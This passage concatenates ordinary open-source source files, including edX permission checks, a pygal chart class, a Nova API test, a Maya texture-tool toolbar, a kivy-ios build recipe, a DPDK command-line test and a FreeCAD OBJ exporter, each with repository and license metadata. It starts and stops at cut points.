return self._create_attachments(self._create_alternatives(msg))
def _create_alternatives(self, msg):
encoding = self.encoding or settings.DEFAULT_CHARSET
if self.alternatives:
body_msg = msg
msg = SafeMIMEMultipart(_subtype=self.alternative_subtype, encoding=encoding)
if self.body:
msg.attach(body_msg)
for alternative in self.alternatives:
msg.attach(self._create_mime_attachment(*alternative))
return msg
| bsd-3-clause |
utecuy/edx-platform | common/djangoapps/student/auth.py | 111 | 5910 | """
The application interface to roles which checks whether any user trying to change
authorization has authorization to do so, which infers authorization via role hierarchy
(GlobalStaff is superset of auths of course instructor, ...), which consults the config
to decide whether to check course creator role, and other such functions.
"""
from django.core.exceptions import PermissionDenied
from django.conf import settings
from opaque_keys.edx.locator import LibraryLocator
from student.roles import GlobalStaff, CourseCreatorRole, CourseStaffRole, CourseInstructorRole, CourseRole, \
CourseBetaTesterRole, OrgInstructorRole, OrgStaffRole, LibraryUserRole, OrgLibraryUserRole
# Studio permissions:
STUDIO_EDIT_ROLES = 8
STUDIO_VIEW_USERS = 4
STUDIO_EDIT_CONTENT = 2
STUDIO_VIEW_CONTENT = 1
# In addition to the above, one is always allowed to "demote" oneself to a lower role within a course, or remove oneself
def user_has_role(user, role):
"""
Check whether this user has access to this role (either direct or implied)
:param user:
:param role: an AccessRole
"""
if not user.is_active:
return False
# do cheapest check first even tho it's not the direct one
if GlobalStaff().has_user(user):
return True
# CourseCreator is odd b/c it can be disabled via config
if isinstance(role, CourseCreatorRole):
# completely shut down course creation setting
if settings.FEATURES.get('DISABLE_COURSE_CREATION', False):
return False
# wide open course creation setting
if not settings.FEATURES.get('ENABLE_CREATOR_GROUP', False):
return True
if role.has_user(user):
return True
# if not, then check inferred permissions
if (isinstance(role, (CourseStaffRole, CourseBetaTesterRole)) and
CourseInstructorRole(role.course_key).has_user(user)):
return True
return False
def get_user_permissions(user, course_key, org=None):
"""
Get the bitmask of permissions that this user has in the given course context.
Can also set course_key=None and pass in an org to get the user's
permissions for that organization as a whole.
"""
if org is None:
org = course_key.org
course_key = course_key.for_branch(None)
else:
assert course_key is None
all_perms = STUDIO_EDIT_ROLES | STUDIO_VIEW_USERS | STUDIO_EDIT_CONTENT | STUDIO_VIEW_CONTENT
# global staff, org instructors, and course instructors have all permissions:
if GlobalStaff().has_user(user) or OrgInstructorRole(org=org).has_user(user):
return all_perms
if course_key and user_has_role(user, CourseInstructorRole(course_key)):
return all_perms
# Staff have all permissions except EDIT_ROLES:
if OrgStaffRole(org=org).has_user(user) or (course_key and user_has_role(user, CourseStaffRole(course_key))):
return STUDIO_VIEW_USERS | STUDIO_EDIT_CONTENT | STUDIO_VIEW_CONTENT
# Otherwise, for libraries, users can view only:
if course_key and isinstance(course_key, LibraryLocator):
if OrgLibraryUserRole(org=org).has_user(user) or user_has_role(user, LibraryUserRole(course_key)):
return STUDIO_VIEW_USERS | STUDIO_VIEW_CONTENT
return 0
def has_studio_write_access(user, course_key):
"""
Return True if user has studio write access to the given course.
Note that the CMS permissions model is with respect to courses.
There is a super-admin permissions if user.is_staff is set.
Also, since we're unifying the user database between LMS and CAS,
I'm presuming that the course instructor (formally known as admin)
will not be in both INSTRUCTOR and STAFF groups, so we have to cascade our
queries here as INSTRUCTOR has all the rights that STAFF do.
:param user:
:param course_key: a CourseKey
"""
return bool(STUDIO_EDIT_CONTENT & get_user_permissions(user, course_key))
def has_course_author_access(user, course_key):
"""
Old name for has_studio_write_access
"""
return has_studio_write_access(user, course_key)
def has_studio_read_access(user, course_key):
"""
Return True iff user is allowed to view this course/library in studio.
Will also return True if user has write access in studio (has_course_author_access)
There is currently no such thing as read-only course access in studio, but
there is read-only access to content libraries.
"""
return bool(STUDIO_VIEW_CONTENT & get_user_permissions(user, course_key))
def add_users(caller, role, *users):
"""
The caller requests adding the given users to the role. Checks that the caller
has sufficient authority.
:param caller: a user
:param role: an AccessRole
"""
_check_caller_authority(caller, role)
role.add_users(*users)
def remove_users(caller, role, *users):
"""
The caller requests removing the given users from the role. Checks that the caller
has sufficient authority.
:param caller: a user
:param role: an AccessRole
"""
# can always remove self (at this layer)
if not(len(users) == 1 and caller == users[0]):
_check_caller_authority(caller, role)
role.remove_users(*users)
def _check_caller_authority(caller, role):
"""
Internal function to check whether the caller has authority to manipulate this role
:param caller: a user
:param role: an AccessRole
"""
if not (caller.is_authenticated() and caller.is_active):
raise PermissionDenied
# superuser
if GlobalStaff().has_user(caller):
return
if isinstance(role, (GlobalStaff, CourseCreatorRole)):
raise PermissionDenied
elif isinstance(role, CourseRole): # instructors can change the roles w/in their course
if not user_has_role(caller, CourseInstructorRole(role.course_key)):
raise PermissionDenied
| agpl-3.0 |
colevscode/pygal | pygal/graph/verticalpyramid.py | 2 | 3418 | # -*- coding: utf-8 -*-
# This file is part of pygal
#
# A python svg graph plotting library
# Copyright © 2012-2014 Kozea
#
# This library is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# This library is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with pygal. If not, see <http://www.gnu.org/licenses/>.
"""
Pyramid chart
"""
from __future__ import division
from pygal.adapters import positive
from pygal.graph.stackedbar import StackedBar
class VerticalPyramid(StackedBar):
"""Pyramid graph"""
_adapters = [positive]
def _format(self, value):
value = value and abs(value)
return super(VerticalPyramid, self)._format(value)
def _get_separated_values(self, secondary=False):
series = self.secondary_series if secondary else self.series
positive_vals = zip(*[serie.safe_values
for index, serie in enumerate(series)
if index % 2])
negative_vals = zip(*[serie.safe_values
for index, serie in enumerate(series)
if not index % 2])
return list(positive_vals), list(negative_vals)
def _compute_box(self, positive_vals, negative_vals):
positive_sum = list(map(sum, positive_vals)) or [self.zero]
negative_sum = list(map(sum, negative_vals)) or [self.zero]
self._box.ymax = max(max(positive_sum), max(negative_sum))
self._box.ymin = - self._box.ymax
def _compute_secondary(self):
# Need refactoring
if self.secondary_series:
y_pos = list(zip(*self._y_labels))[1]
positive_vals, negative_vals = self._get_separated_values(True)
positive_sum = map(sum, positive_vals) or [self.zero]
negative_sum = map(sum, negative_vals) or [self.zero]
ymax = max(max(positive_sum), max(negative_sum))
ymin = -ymax
min_0_ratio = (self.zero - self._box.ymin) / self._box.height
max_0_ratio = (self._box.ymax - self.zero) / self._box.height
new_ymax = (self.zero - ymin) * (1 / min_0_ratio - 1)
new_ymin = -(ymax - self.zero) * (1 / max_0_ratio - 1)
if ymax > self._box.ymax:
ymin = new_ymin
else:
ymax = new_ymax
left_range = abs(self._box.ymax - self._box.ymin)
right_range = abs(ymax - ymin)
self._scale = left_range / right_range
self._scale_diff = self._box.ymin
self._scale_min_2nd = ymin
self._y_2nd_labels = [
(self._format(self._box.xmin + y * right_range / left_range),
y)
for y in y_pos]
def _bar(self, parent, x, y, index, i, zero, shift=True, secondary=False):
if index % 2:
y = -y
return super(VerticalPyramid, self)._bar(
parent, x, y, index, i, zero, False, secondary)
| lgpl-3.0 |
zzicewind/nova | nova/tests/functional/v3/test_networks.py | 3 | 3929 | # Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from nova.network import api as network_api
from nova.tests.functional.v3 import api_sample_base
from nova.tests.unit.api.openstack.compute.contrib import test_networks
CONF = cfg.CONF
CONF.import_opt('osapi_compute_extension',
'nova.api.openstack.compute.legacy_v2.extensions')
class NetworksJsonTests(api_sample_base.ApiSampleTestBaseV3):
ADMIN_API = True
extension_name = "os-networks"
# TODO(gmann): Overriding '_api_version' till all functional tests
# are merged between v2 and v2.1. After that base class variable
# itself can be changed to 'v2'
_api_version = 'v2'
def _get_flags(self):
f = super(NetworksJsonTests, self)._get_flags()
f['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
f['osapi_compute_extension'].append('nova.api.openstack.compute.'
'contrib.os_networks.Os_networks')
f['osapi_compute_extension'].append('nova.api.openstack.compute.'
'contrib.extended_networks.Extended_networks')
return f
def setUp(self):
super(NetworksJsonTests, self).setUp()
fake_network_api = test_networks.FakeNetworkAPI()
self.stubs.Set(network_api.API, "get_all",
fake_network_api.get_all)
self.stubs.Set(network_api.API, "get",
fake_network_api.get)
self.stubs.Set(network_api.API, "associate",
fake_network_api.associate)
self.stubs.Set(network_api.API, "delete",
fake_network_api.delete)
self.stubs.Set(network_api.API, "create",
fake_network_api.create)
self.stubs.Set(network_api.API, "add_network_to_project",
fake_network_api.add_network_to_project)
def test_network_list(self):
response = self._do_get('os-networks')
subs = self._get_regexes()
self._verify_response('networks-list-resp', subs, response, 200)
def test_network_disassociate(self):
uuid = test_networks.FAKE_NETWORKS[0]['uuid']
response = self._do_post('os-networks/%s/action' % uuid,
'networks-disassociate-req', {})
self.assertEqual(response.status_code, 202)
self.assertEqual(response.content, "")
def test_network_show(self):
uuid = test_networks.FAKE_NETWORKS[0]['uuid']
response = self._do_get('os-networks/%s' % uuid)
subs = self._get_regexes()
self._verify_response('network-show-resp', subs, response, 200)
def test_network_create(self):
response = self._do_post("os-networks",
'network-create-req', {})
subs = self._get_regexes()
self._verify_response('network-create-resp', subs, response, 200)
def test_network_add(self):
response = self._do_post("os-networks/add",
'network-add-req', {})
self.assertEqual(response.status_code, 202)
self.assertEqual(response.content, "")
def test_network_delete(self):
response = self._do_delete('os-networks/always_delete')
self.assertEqual(response.status_code, 202)
self.assertEqual(response.content, "")
| apache-2.0 |
Bioeden/dbMayaTextureToolkit | mttViewStatusLine.py | 1 | 16620 | # Python import
import os
# PySide import
from PySide.QtCore import Qt, Signal
from PySide.QtGui import (QHBoxLayout, QLabel)
# Maya import
from maya import cmds
# Custom import
from mttConfig import MTTSettings
from mttCustomWidget import StatusCollapsibleLayout, StatusScrollArea
import mttFilterFileDialog
import mttCmd
import mttCmdUi
class MTTStatusLine(QHBoxLayout):
""" Create custom toolbar with collapse Maya Status Line behavior """
viewerToggled = Signal()
filterSelectionToggled = Signal(bool)
pinModeToggled = Signal(bool)
externalVizToggled = Signal()
def __init__(self, settings_menu, model, proxy):
super(MTTStatusLine, self).__init__()
self.settings_menu = settings_menu
self.model = model
self.proxy = proxy
self.__create_ui()
self.__init_ui()
def __create_ui(self):
# FILTERS
scroll_area = StatusScrollArea()
scroll_area.add_widget(self._create_filter_group())
scroll_area.add_widget(self._create_visibility_group())
scroll_area.add_widget(self._create_folder_group())
scroll_area.add_widget(self._create_auto_group())
scroll_area.add_widget(self._create_mtt_tools_group())
scroll_area.add_widget(self._create_maya_tools_group())
user_grp = self._create_user_group()
if user_grp:
scroll_area.add_widget(user_grp)
self.addWidget(scroll_area)
# STATS information
self.stat_info = QLabel()
self.stat_info.setAlignment(Qt.AlignCenter | Qt.AlignRight)
self.stat_info.setText('0 File | 0/0 Node')
self.stat_info.setToolTip(
'number of files | number of nodes shown / total number of nodes')
self.addWidget(self.stat_info)
# SETTINGS button
self.info_btn = mttCmdUi.create_status_button(
':/tb_config', 'Settings', None, False)
self.info_btn.setMenu(self.settings_menu)
self.addWidget(self.info_btn)
def __init_ui(self):
self.setContentsMargins(0, 0, 0, 0)
self.setAlignment(Qt.AlignLeft)
# FILTER GROUP
self.selection_btn.setChecked(MTTSettings.value('onlySelectionState'))
self.writable_btn.setChecked(MTTSettings.value('onlyWritableState'))
self.reference_btn.setChecked(MTTSettings.value('showReferenceState'))
self.wrong_name_btn.setChecked(MTTSettings.value('showWrongNameState'))
self.filter_instances_btn.setChecked(
MTTSettings.value('filterInstances'))
self.filter_grp.set_current_state(MTTSettings.value('filterGroup'))
# VISIBILITY GROUP
self.wrong_name_visibility_btn.setChecked(
MTTSettings.value('vizWrongNameState'))
self.wrong_path_visibility_btn.setChecked(
MTTSettings.value('vizWrongPathState'))
self.external_visibility_btn.setChecked(
MTTSettings.value('vizExternalState'))
self.basename_visibility_btn.setChecked(
MTTSettings.value('showBasenameState'))
self.namespace_visibility_btn.setChecked(
not MTTSettings.value('showNamespaceState'))
self.visibility_grp.set_current_state(MTTSettings.value('visibilityGroup'))
# FOLDER GROUP
self.folder_grp.set_current_state(MTTSettings.value('folderGroup'))
# AUTO GROUP
self.auto_reload_btn.setChecked(MTTSettings.value('autoReload'))
self.auto_select_btn.setChecked(MTTSettings.value('autoSelect'))
self.auto_rename_btn.setChecked(MTTSettings.value('autoRename'))
self.auto_grp.set_current_state(MTTSettings.value('autoGroup'))
# MTT TOOLS
self.viewer_btn.setChecked(MTTSettings.value('viewerState'))
self.tool_grp.set_current_state(MTTSettings.value('toolGroup', 1))
# MAYA TOOLS SHORTCUT
self.maya_grp.set_current_state(MTTSettings.value('mayaGroup', 1))
def _create_filter_group(self):
# create toolbar buttons
self.selection_btn = mttCmdUi.create_status_button(
':/tb_onlySelection',
'Show textures applied to current selection',
self.on_show_only_selection,
True)
self.writable_btn = mttCmdUi.create_status_button(
':/tb_onlyWritable',
'Hide read-only textures',
self.on_show_only_writable,
True)
self.reference_btn = mttCmdUi.create_status_button(
':/tb_onlyReference',
'Hide references',
self.on_show_reference,
True)
self.pin_btn = mttCmdUi.create_status_button(
':/tb_onlyPinned',
'Pin textures',
self.on_pin_nodes,
True)
self.wrong_name_btn = mttCmdUi.create_status_button(
':/tb_onlyWrongName',
'Show Node name clashing with Texture name',
self.on_show_wrong_name,
True)
self.filter_instances_btn = mttCmdUi.create_status_button(
':/tb_hideInstances',
'Show only one instance per file',
self.on_filter_instances,
True)
# sort toolbar buttons
self.filter_grp = StatusCollapsibleLayout(
section_name='Show/Hide the filter icons')
self.filter_grp.add_button(self.pin_btn)
self.filter_grp.add_button(self.selection_btn)
self.filter_grp.add_button(self.reference_btn)
self.filter_grp.add_button(self.writable_btn)
self.filter_grp.add_button(self.wrong_name_btn)
self.filter_grp.add_button(self.filter_instances_btn)
return self.filter_grp
def _create_visibility_group(self):
# create toolbar buttons
self.wrong_name_visibility_btn = mttCmdUi.create_status_button(
':/tb_vizWrongName',
'Highlight Node name clashing with Texture name',
self.on_wrong_name_visibility,
True)
self.external_visibility_btn = mttCmdUi.create_status_button(
':/tb_vizExternal',
'Highlight Texture path that comes from outside current workspace',
self.on_external_visibility,
True)
self.wrong_path_visibility_btn = mttCmdUi.create_status_button(
':/tb_vizWrongPath',
'Highlight Texture path clashing with user defined path pattern',
self.on_wrong_path_visibility,
True)
self.basename_visibility_btn = mttCmdUi.create_status_button(
':/tb_vizBasename',
'Show files texture name only',
self.on_basename_visibility,
True)
self.namespace_visibility_btn = mttCmdUi.create_status_button(
':/tb_vizNamespace',
'Toggle namespace visibility',
self.on_namespace_visibility,
True)
# sort toolbar buttons
self.visibility_grp = StatusCollapsibleLayout(
section_name='Show/Hide the visibility icons')
self.visibility_grp.add_button(self.namespace_visibility_btn)
self.visibility_grp.add_button(self.wrong_name_visibility_btn)
self.visibility_grp.add_button(self.external_visibility_btn)
self.visibility_grp.add_button(self.wrong_path_visibility_btn)
self.visibility_grp.add_button(self.basename_visibility_btn)
return self.visibility_grp
def _create_folder_group(self):
self.folder_grp = StatusCollapsibleLayout(
section_name='Show/Hide the folder icons')
# create toolbar buttons
self.folder_grp.add_button(mttCmdUi.create_status_button(
':/tb_folderMap',
'Open sourceimages folder',
self.on_open_sourceimages_folder,
False)
)
self.folder_grp.add_button(mttCmdUi.create_status_button(
':/tb_folderSrc',
'Open source folder',
self.on_open_source_folder,
False)
)
return self.folder_grp
def _create_auto_group(self):
# create toolbar buttons
self.auto_reload_btn = mttCmdUi.create_status_button(
':/tb_toolbar_autoReload',
'Auto Reload Textures',
self.on_auto_reload,
True)
self.auto_select_btn = mttCmdUi.create_status_button(
':/tb_toolbar_autoSelect',
'Auto Select Textures Node',
self.on_auto_select,
True)
self.auto_rename_btn = mttCmdUi.create_status_button(
':/tb_toolbar_autoRename',
'Auto Rename Textures Node',
self.on_auto_rename,
True)
# sort toolbar buttons
self.auto_grp = StatusCollapsibleLayout(
section_name='Show/Hide the auto actions icons')
self.auto_grp.add_button(self.auto_reload_btn)
self.auto_grp.add_button(self.auto_select_btn)
self.auto_grp.add_button(self.auto_rename_btn)
return self.auto_grp
def _create_mtt_tools_group(self):
# create toolbar buttons
self.viewer_btn = mttCmdUi.create_status_button(
':/tb_Viewer',
'Show/Hide Viewer',
self.on_toggle_viewer,
False)
create_node_btn = mttCmdUi.create_status_button(
':/tb_toolCreateNode',
'Create Node',
self.on_create_node,
False)
# sort toolbar buttons
self.tool_grp = StatusCollapsibleLayout(
section_name='Show/Hide the tools icons')
self.tool_grp.add_button(self.viewer_btn)
self.tool_grp.add_button(create_node_btn)
return self.tool_grp
def _create_maya_tools_group(self):
# sort toolbar buttons
self.maya_grp = StatusCollapsibleLayout(
section_name='Show/Hide the Maya tools icons')
# create toolbar buttons
self.maya_grp.add_button(mttCmdUi.create_status_button(
':/tb_Hypershade',
'Hypershade',
self.on_open_hypershade,
False)
)
self.maya_grp.add_button(mttCmdUi.create_status_button(
':/tb_NodeEditor',
'Node Editor',
self.on_open_node_editor,
False)
)
self.maya_grp.add_button(mttCmdUi.create_status_button(
':/tb_UVEditor',
'UV Texture Editor',
self.on_open_uv_editor,
False)
)
return self.maya_grp
def _create_user_group(self):
if MTTSettings.CUSTOM_BUTTONS:
self.custom_grp = StatusCollapsibleLayout(
section_name='Show/Hide custom tools')
for btnData in MTTSettings.CUSTOM_BUTTONS:
self.custom_grp.add_button(mttCmdUi.create_status_button(
btnData[0],
btnData[1],
eval(btnData[2]),
False)
)
return self.custom_grp
def _set_filter_value(self, key, value):
self.model.layoutAboutToBeChanged.emit()
MTTSettings.set_value(key, value)
cmds.optionVar(stringValue=('filtered_instances', ''))
self.model.layoutChanged.emit()
self.update_node_file_count()
def on_show_only_selection(self):
""" Filter nodes from current selection """
state = self.selection_btn.isChecked()
MTTSettings.set_value('onlySelectionState', state)
self.filterSelectionToggled.emit(state)
def on_show_only_writable(self):
""" Filter nodes with their file state """
self._set_filter_value(
'onlyWritableState', self.writable_btn.isChecked())
def on_show_reference(self):
""" Filter referenced nodes """
self._set_filter_value(
'showReferenceState', self.reference_btn.isChecked())
def on_pin_nodes(self):
""" Filter pinned nodes """
self.pinModeToggled.emit(self.pin_btn.isChecked())
def on_show_wrong_name(self):
""" Filter node with the same name as texture """
self._set_filter_value(
'showWrongNameState', self.wrong_name_btn.isChecked())
def on_wrong_name_visibility(self):
""" Highlight node with the same name as texture """
self._set_filter_value(
'vizWrongNameState', self.wrong_name_visibility_btn.isChecked())
def on_wrong_path_visibility(self):
""" Highlight Texture path clashing with user defined path pattern """
self._set_filter_value(
'vizWrongPathState', self.wrong_path_visibility_btn.isChecked())
def on_external_visibility(self):
""" Highlight Texture path that comes from outside current workspace """
state = self.external_visibility_btn.isChecked()
self._set_filter_value('vizExternalState', state)
if state:
self.externalVizToggled.emit()
def on_basename_visibility(self):
""" Filter file path """
self._set_filter_value(
'showBasenameState', self.basename_visibility_btn.isChecked())
def on_namespace_visibility(self):
""" Filter namespace name """
self._set_filter_value(
'showNamespaceState', not self.namespace_visibility_btn.isChecked())
def on_filter_instances(self):
""" Show only one instance per file """
self._set_filter_value(
'filterInstances', self.filter_instances_btn.isChecked())
def on_open_sourceimages_folder(self):
""" Open sourceimages folder """
folder_path = self.model.get_sourceimages_path()
if os.path.isdir(folder_path):
os.startfile(folder_path)
# launchImageEditor can be an alternative
# cmds.launchImageEditor(viewImageFile=directory)
@staticmethod
def on_open_source_folder():
""" Open source folder """
folder_path = mttCmd.get_texture_source_folder()
if os.path.isdir(folder_path):
os.startfile(folder_path)
@staticmethod
def on_auto_reload():
state = MTTSettings.value('autoReload')
MTTSettings.set_value('autoReload', not state)
@staticmethod
def on_auto_select():
state = MTTSettings.value('autoSelect')
MTTSettings.set_value('autoSelect', not state)
@staticmethod
def on_auto_rename():
state = MTTSettings.value('autoRename')
MTTSettings.set_value('autoRename', not state)
def on_toggle_viewer(self):
self.viewerToggled.emit()
@staticmethod
def on_create_node():
mttFilterFileDialog.create_nodes()
@staticmethod
def on_open_hypershade():
""" Open Maya Hypershade """
cmds.HypershadeWindow()
@staticmethod
def on_open_node_editor():
""" Open Maya Hypershade """
cmds.NodeEditorWindow()
@staticmethod
def on_open_uv_editor():
""" Open Maya UV Texture Editor """
cmds.TextureViewWindow()
def update_node_file_count(self):
file_count = self.model.get_file_count()
file_str = 'file{}'.format(['', 's'][file_count > 1])
node_shown_count = self.proxy.rowCount()
node_count = self.model.get_node_count()
node_str = 'node' if node_count < 1 else 'nodes'
self.stat_info.setText('%d %s | %d/%d %s' % (
file_count, file_str, node_shown_count, node_count, node_str))
def save_states(self):
# buttons states
MTTSettings.set_value('onlySelectionState', self.selection_btn.isChecked())
MTTSettings.set_value('onlyWritableState', self.writable_btn.isChecked())
MTTSettings.set_value('showReferenceState', self.reference_btn.isChecked())
MTTSettings.set_value('showWrongNameState', self.wrong_name_btn.isChecked())
MTTSettings.remove('pinnedNode')
MTTSettings.set_value('vizWrongNameState', self.wrong_name_visibility_btn.isChecked())
MTTSettings.set_value('showBasenameState', self.basename_visibility_btn.isChecked())
MTTSettings.set_value('filterInstances', self.filter_instances_btn.isChecked())
# groups states
MTTSettings.set_value('filterGroup', self.filter_grp.current_state())
MTTSettings.set_value('visibilityGroup', self.visibility_grp.current_state())
MTTSettings.set_value('folderGroup', self.folder_grp.current_state())
MTTSettings.set_value('autoGroup', self.auto_grp.current_state())
MTTSettings.set_value('toolGroup', self.tool_grp.current_state())
MTTSettings.set_value('mayaGroup', self.maya_grp.current_state())
| mit |
rnixx/kivy-ios | recipes/sdl2_ttf/__init__.py | 3 | 1111 | from toolchain import Recipe, shprint
from os.path import join
import sh
import shutil
import shlex
class LibSDL2TTFRecipe(Recipe):
version = "2.0.12"
url = "https://www.libsdl.org/projects/SDL_ttf/release/SDL2_ttf-{version}.tar.gz"
library = "libSDL2_ttf.a"
include_dir = "SDL_ttf.h"
depends = ["sdl2", "freetype"]
def build_arch(self, arch):
# XCode-iOS have shipped freetype that don't work with i386
# ./configure require too much things to setup it correcly.
# so build by hand.
build_env = arch.get_env()
cc = sh.Command(build_env["CC"])
output = join(self.build_dir, "SDL_ttf.o")
args = shlex.split(build_env["CFLAGS"])
args += ["-c", "-o", output, "SDL_ttf.c"]
shprint(cc, *args)
shprint(sh.ar, "-q", join(self.build_dir, "libSDL2_ttf.a"), output)
def install(self):
for arch in self.filtered_archs:
shutil.copy(
join(self.get_build_dir(arch.arch), "SDL_ttf.h"),
join(self.ctx.include_dir, "common", "SDL2"))
recipe = LibSDL2TTFRecipe()
| mit |
alianmohammad/dpdk | app/cmdline_test/cmdline_test.py | 40 | 3778 | #!/usr/bin/python
# BSD LICENSE
#
# Copyright(c) 2010-2014 Intel Corporation. All rights reserved.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Intel Corporation nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Script that runs cmdline_test app and feeds keystrokes into it.
import sys, pexpect, string, os, cmdline_test_data
#
# function to run test
#
def runTest(child,test):
child.send(test["Sequence"])
if test["Result"] == None:
return 0
child.expect(test["Result"],1)
#
# history test is a special case
#
# This test does the following:
# 1) fills the history with garbage up to its full capacity
# (just enough to remove last entry)
# 2) scrolls back history to the very beginning
# 3) checks if the output is as expected, that is, the first
# number in the sequence (not the last entry before it)
#
# This is a self-contained test, it needs only a pexpect child
#
def runHistoryTest(child):
# find out history size
child.sendline(cmdline_test_data.CMD_GET_BUFSIZE)
child.expect("History buffer size: \\d+", timeout=1)
history_size = int(child.after[len(cmdline_test_data.BUFSIZE_TEMPLATE):])
i = 0
# fill the history with numbers
while i < history_size / 10:
# add 1 to prevent from parsing as octals
child.send("1" + str(i).zfill(8) + cmdline_test_data.ENTER)
# the app will simply print out the number
child.expect(str(i + 100000000), timeout=1)
i += 1
# scroll back history
child.send(cmdline_test_data.UP * (i + 2) + cmdline_test_data.ENTER)
child.expect("100000000", timeout=1)
# the path to cmdline_test executable is supplied via command-line.
if len(sys.argv) < 2:
print "Error: please supply cmdline_test app path"
sys.exit(1)
test_app_path = sys.argv[1]
if not os.path.exists(test_app_path):
print "Error: please supply cmdline_test app path"
sys.exit(1)
child = pexpect.spawn(test_app_path)
print "Running command-line tests..."
for test in cmdline_test_data.tests:
print (test["Name"] + ":").ljust(30),
try:
runTest(child,test)
print "PASS"
except:
print "FAIL"
print child
sys.exit(1)
# since last test quits the app, run new instance
child = pexpect.spawn(test_app_path)
print ("History fill test:").ljust(30),
try:
runHistoryTest(child)
print "PASS"
except:
print "FAIL"
print child
sys.exit(1)
child.close()
sys.exit(0)
| lgpl-2.1 |
balazs-bamer/FreeCAD-Surface | src/Mod/Arch/importOBJ.py | 9 | 5268 | #***************************************************************************
#* *
#* Copyright (c) 2011 *
#* Yorik van Havre <yorik@uncreated.net> *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************
import FreeCAD, DraftGeomUtils, Part, Draft
from DraftTools import translate
p = Draft.precision()
if open.__module__ == '__builtin__':
pythonopen = open
def findVert(aVertex,aList):
"finds aVertex in aList, returns index"
for i in range(len(aList)):
if ( round(aVertex.X,p) == round(aList[i].X,p) ):
if ( round(aVertex.Y,p) == round(aList[i].Y,p) ):
if ( round(aVertex.Z,p) == round(aList[i].Z,p) ):
return i
def getIndices(shape,offset):
"returns a list with 2 lists: vertices and face indexes, offsetted with the given amount"
vlist = []
elist = []
flist = []
curves = None
for e in shape.Edges:
if not isinstance(e.Curve,Part.Line):
if not curves:
curves = shape.tessellate(1)
FreeCAD.Console.PrintWarning(translate("Arch","Found a shape containing curves, triangulating\n"))
if curves:
for v in curves[0]:
vlist.append(" "+str(round(v.x,p))+" "+str(round(v.y,p))+" "+str(round(v.z,p)))
for f in curves[1]:
fi = ""
for vi in f:
fi += " " + str(vi + offset)
flist.append(fi)
else:
for v in shape.Vertexes:
vlist.append(" "+str(round(v.X,p))+" "+str(round(v.Y,p))+" "+str(round(v.Z,p)))
if not shape.Faces:
for e in shape.Edges:
if DraftGeomUtils.geomType(e) == "Line":
ei = " " + str(findVert(e.Vertexes[0],shape.Vertexes) + offset)
ei += " " + str(findVert(e.Vertexes[-1],shape.Vertexes) + offset)
elist.append(ei)
for f in shape.Faces:
if len(f.Wires) > 1:
# if we have holes, we triangulate
tris = f.tessellate(1)
for fdata in tris[1]:
fi = ""
for vi in fdata:
vdata = Part.Vertex(tris[0][vi])
fi += " " + str(findVert(vdata,shape.Vertexes) + offset)
flist.append(fi)
else:
fi = ""
# OCC vertices are unsorted. We need to sort in the right order...
edges = DraftGeomUtils.sortEdges(f.OuterWire.Edges)
#print edges
for e in edges:
#print e.Vertexes[0].Point,e.Vertexes[1].Point
v = e.Vertexes[0]
fi += " " + str(findVert(v,shape.Vertexes) + offset)
flist.append(fi)
return vlist,elist,flist
def export(exportList,filename):
"called when freecad exports a file"
outfile = pythonopen(filename,"wb")
ver = FreeCAD.Version()
outfile.write("# FreeCAD v" + ver[0] + "." + ver[1] + " build" + ver[2] + " Arch module\n")
outfile.write("# http://www.freecadweb.org\n")
offset = 1
for obj in exportList:
if obj.isDerivedFrom("Part::Feature"):
if obj.ViewObject.isVisible():
vlist,elist,flist = getIndices(obj.Shape,offset)
offset += len(vlist)
outfile.write("o " + obj.Name + "\n")
